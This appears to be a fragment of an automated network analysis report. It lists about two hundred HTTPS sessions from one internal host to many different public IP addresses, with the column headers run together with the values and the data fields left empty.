                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14880192.168.2.1459994190.19.14.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14881192.168.2.143303637.136.162.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14882192.168.2.1453730113.121.61.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14883192.168.2.146090054.113.20.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14884192.168.2.145359253.212.1.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14885192.168.2.1455184184.143.205.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14886192.168.2.1444464206.192.224.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14887192.168.2.1457300160.13.118.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14888192.168.2.1433180188.147.93.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14889192.168.2.1456852196.161.184.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14890192.168.2.1434622153.175.97.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14891192.168.2.1435264173.211.81.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14892192.168.2.14528089.41.194.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14893192.168.2.145286643.26.160.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14894192.168.2.1457406186.36.216.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14895192.168.2.143409453.36.16.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14896192.168.2.146038284.90.62.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14897192.168.2.144345419.16.39.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14898192.168.2.1460022100.175.18.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14899192.168.2.1458522131.99.192.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14900192.168.2.14534588.247.161.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14901192.168.2.1449632164.158.103.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14902192.168.2.1439150166.6.230.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14903192.168.2.1449202125.122.215.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14904192.168.2.145864231.44.40.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14905192.168.2.1456742132.4.77.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14906192.168.2.1458292100.231.207.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14907192.168.2.1449176111.27.20.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14908192.168.2.1450092175.171.108.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14909192.168.2.1440636172.218.150.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14910192.168.2.144563827.35.172.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14911192.168.2.1443670114.12.74.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14912192.168.2.145766818.182.135.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14913192.168.2.1442578212.231.3.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14914192.168.2.145655213.23.146.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14915192.168.2.1437252175.240.16.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14916192.168.2.145296436.28.165.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14917192.168.2.1460510143.76.86.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14918192.168.2.1441664123.6.81.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14919192.168.2.1451998143.42.238.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14920192.168.2.144121636.169.161.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14921192.168.2.1444694155.205.254.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14922192.168.2.1450518168.191.67.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14923192.168.2.145468635.26.123.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14924192.168.2.1447074153.31.115.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14925192.168.2.143578487.170.191.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14926192.168.2.1450052117.187.153.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14927192.168.2.145167246.65.18.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14928192.168.2.1435586186.0.86.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14929192.168.2.1460876111.23.149.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14930192.168.2.1447044202.27.250.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14931192.168.2.143859442.34.116.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14932192.168.2.1439394218.16.248.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14933192.168.2.1436270161.94.244.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14934192.168.2.1454204202.152.12.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14935192.168.2.1459454181.187.36.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14936192.168.2.146045476.20.157.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14937192.168.2.1454452106.231.93.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14938192.168.2.1440990145.90.54.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14939192.168.2.14348849.185.49.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14940192.168.2.144747893.201.224.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14941192.168.2.1447254220.57.232.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14942192.168.2.1447412167.225.182.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14943192.168.2.1458292182.29.251.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14944192.168.2.1440472164.224.142.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14945192.168.2.143304860.231.183.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14946192.168.2.1435296164.139.147.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14947192.168.2.1450238196.160.114.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14948192.168.2.145724487.19.97.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14949192.168.2.143563683.215.104.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14950192.168.2.1449890161.120.49.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14951192.168.2.1454946155.114.87.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14952192.168.2.144515682.120.13.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14953192.168.2.1457266198.84.113.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14954192.168.2.1446766113.164.84.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14955192.168.2.1443120120.199.192.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14956192.168.2.144319048.174.235.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14957192.168.2.143736897.213.198.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14958192.168.2.1434478190.72.72.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14959192.168.2.1460712162.226.34.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14960192.168.2.1448418144.96.200.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14961192.168.2.145182693.119.167.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14962192.168.2.1441216204.118.103.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14963192.168.2.1436228165.97.227.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14964192.168.2.1444960130.4.75.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14965192.168.2.144475667.22.53.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14966192.168.2.1433854108.52.176.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14967192.168.2.144584477.108.85.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14968192.168.2.1453592200.56.179.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14969192.168.2.1456066103.77.196.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14970192.168.2.1440096155.188.80.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14971192.168.2.1458876196.10.7.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14972192.168.2.1452632119.212.202.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14973192.168.2.1447950128.253.216.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14974192.168.2.1439786183.10.221.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14975192.168.2.1435540149.122.129.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14976192.168.2.144308082.161.235.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14977192.168.2.143703674.12.125.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14978192.168.2.143696683.69.77.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14979192.168.2.144285018.115.230.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14980192.168.2.1454282192.215.97.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14981192.168.2.1457010195.40.154.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14982192.168.2.1444474220.76.131.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14983192.168.2.1440172207.91.253.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14984192.168.2.1443588202.160.0.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14985192.168.2.1440100206.112.133.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14986192.168.2.1433334117.67.52.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14987192.168.2.1451950138.75.255.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14988192.168.2.145541469.153.67.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14989192.168.2.1437034177.27.243.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14990192.168.2.1435178155.87.127.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14991192.168.2.1456378212.247.105.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14992192.168.2.145949424.69.194.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14993192.168.2.1459954220.77.205.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14994192.168.2.1457616100.56.57.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14995192.168.2.144716899.151.70.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14996192.168.2.1436286172.122.204.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14997192.168.2.145017894.15.138.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14998192.168.2.145361849.161.79.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14999192.168.2.14429105.153.13.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15000192.168.2.145684691.206.62.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15001192.168.2.1456768137.201.179.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15002192.168.2.14592488.135.226.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15003192.168.2.143907683.244.180.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15004192.168.2.145341651.82.227.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15005192.168.2.1433418157.173.250.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15006192.168.2.144317612.130.71.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15007192.168.2.1442658193.183.87.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15008192.168.2.1460832180.19.195.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15009192.168.2.143300898.10.34.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15010192.168.2.1439894210.242.155.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15011192.168.2.143764214.32.13.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15012192.168.2.146033441.188.194.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15013192.168.2.143315084.118.14.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15014192.168.2.1458670212.10.149.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15015192.168.2.145579460.28.69.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15016192.168.2.1458400196.20.185.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15017192.168.2.1450522206.112.89.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15018192.168.2.143998868.207.128.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15019192.168.2.145411864.117.70.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15020192.168.2.1458344195.110.254.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15021192.168.2.1445212211.189.9.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15022192.168.2.1436104203.137.235.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15023192.168.2.145421047.129.118.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15024192.168.2.145449694.196.143.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15025192.168.2.144002839.129.113.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15026192.168.2.1447142145.177.99.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15027192.168.2.1434594106.69.61.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15028192.168.2.1459348170.54.223.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15029192.168.2.1440768108.248.41.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15030192.168.2.14528569.76.199.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15031192.168.2.144900427.242.177.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15032192.168.2.145605868.70.254.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15033192.168.2.144215065.62.253.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15034192.168.2.1440842172.96.204.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15035192.168.2.1459552144.20.222.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15036192.168.2.143766887.174.84.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15037192.168.2.1445112222.93.160.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15038192.168.2.1445220163.125.148.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15039192.168.2.143499457.94.201.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15040192.168.2.1437566132.162.125.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15041192.168.2.1437592198.249.168.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15042192.168.2.1444176198.158.225.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15043192.168.2.1456670180.217.37.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15044192.168.2.143790483.230.9.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15045192.168.2.144036279.127.219.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15046192.168.2.1436040170.79.236.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15047192.168.2.145881475.189.104.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15048192.168.2.145396079.173.52.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15049192.168.2.1454854212.72.74.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15050192.168.2.1437098211.71.82.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15051192.168.2.143559884.200.111.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15052192.168.2.143779677.252.168.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15053192.168.2.1445110145.75.161.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15054192.168.2.145388844.143.119.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15055192.168.2.1454104208.242.61.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15056192.168.2.1436040194.114.174.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15057192.168.2.1452194196.200.52.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15058192.168.2.143316051.115.107.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15059192.168.2.143531871.45.220.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15060192.168.2.145124824.83.29.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15061192.168.2.143823018.83.81.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15062192.168.2.1460932185.90.6.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15063192.168.2.1447222175.112.161.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15064192.168.2.145905295.126.106.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15065192.168.2.145434844.64.98.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15066192.168.2.1451006174.6.224.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15067192.168.2.1455948204.74.92.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15068192.168.2.144210843.71.124.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15069192.168.2.144701425.111.241.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15070192.168.2.143710875.188.136.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15071192.168.2.1445598164.109.67.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15072192.168.2.1456096101.45.174.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15073192.168.2.1434372202.89.219.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15074192.168.2.1457232190.15.37.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15075192.168.2.144922869.149.244.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15076192.168.2.14466668.64.195.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15077192.168.2.1444906141.99.28.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15078192.168.2.1433924107.253.40.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15079192.168.2.1443524114.64.253.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15080192.168.2.144074873.232.31.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15081192.168.2.145236064.133.223.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15082192.168.2.1455056161.64.61.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15083192.168.2.143317888.254.190.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15084192.168.2.1444302101.37.65.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15085192.168.2.1448666139.170.108.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15086192.168.2.1457846110.2.138.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15087192.168.2.145309044.1.135.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15088192.168.2.1455664182.58.222.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15089192.168.2.143641662.22.224.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15090192.168.2.1446078157.219.192.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15091192.168.2.14597784.59.227.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
